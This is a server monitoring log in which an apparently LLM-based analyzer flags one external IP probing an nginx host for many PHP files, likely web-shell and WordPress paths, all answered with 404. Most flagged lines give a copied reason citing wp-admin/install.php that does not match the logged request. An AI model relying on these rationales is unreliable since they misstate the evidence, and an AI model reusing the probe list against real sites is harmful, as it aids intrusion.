Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.055060 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.054812780Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /b.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.142776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.142473695Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.389761 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.389507229Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.455776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.455439111Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.521790 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.521412239Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.558783 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: LLM returned 520: error code: 520
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.558846 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-20T12:46:01.828374881Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET /wp-content/plugins/he...
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.587532 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.587311880Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /44.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.660916 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.660715653Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.726827 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.726505710Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:10.508651 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:46:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:10.508686 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single 404 GET request for wp-blogs.php suggests probing for WordPress-related resources; could be incidental or malicious scanning. Line=2026-03-20T12:46:01.894599093Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET /wp-blogs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.005796 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.005840 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file sa.php7 returning 404 from a public domain; could indicate probing or misconfiguration. Line=2026-03-20T12:46:05.830465409Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 404 6622 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.896738474Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006077 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:05.962671563Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006128 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.028595467Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006186 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.095954096Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006225 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.161788785Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006249 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.228410238Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006271 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.294175822Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006295 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.360095718Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006326 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.444476497Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006348 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.647576061Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006370 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.713652371Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006393 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.780460169Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006413 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.846895013Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006438 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.913845396Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006463 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:06.980363421Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006487 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.049794901Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.116584659Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.187101944Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /s.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006560 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.261335398Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006590 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.327050107Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006616 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.407200365Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006642 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.514630315Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006666 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.581142985Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006708 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.648191758Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006734 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.723839964Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006759 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.904492591Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /t.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006821 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:07.972524513Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /file.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006849 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.038545577Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /66.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007583 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.114355337Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007617 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.180041567Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007641 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.271672810Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007670 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.338059904Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007695 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.436469038Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007713 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.502807163Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007731 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.575768051Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007747 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.662871382Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007834 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.734434537Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008064 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.800552561Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008092 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.866486251Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008107 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.932862986Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:08.999187257Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008147 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.235647459Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008185 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.301708415Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008201 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.368289899Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008233 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.434585614Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.500500559Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008383 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.605341403Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.674332332Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008419 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.740781309Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 404 146 "-" "-" "-"
